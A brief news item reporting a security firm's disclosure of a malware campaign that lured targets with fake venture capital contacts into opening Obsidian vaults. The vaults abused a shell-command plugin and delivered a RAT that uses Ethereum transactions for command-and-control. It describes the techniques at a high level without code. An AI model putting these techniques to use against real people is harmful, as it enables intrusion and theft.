TechFlow news: On April 15, Elastic Security Labs disclosed that threat actors impersonated venture capital firms and lured targets into opening malicious Obsidian note libraries via LinkedIn and Telegram. This attack leveraged Obsidian’s Shell Commands plugin to execute malicious payloads without exploiting any vulnerabilities when victims opened the note libraries.
PHANTOMPULSE—a previously undocumented Windows remote access trojan (RAT) discovered in this campaign—uses Ethereum transaction data to enable blockchain-based command-and-control (C2) communications. The macOS payload employs an obfuscated AppleScript dropper and uses a Telegram channel as a fallback C2. Elastic Defend detected and blocked the PHANTOMPULSE execution before it could run.
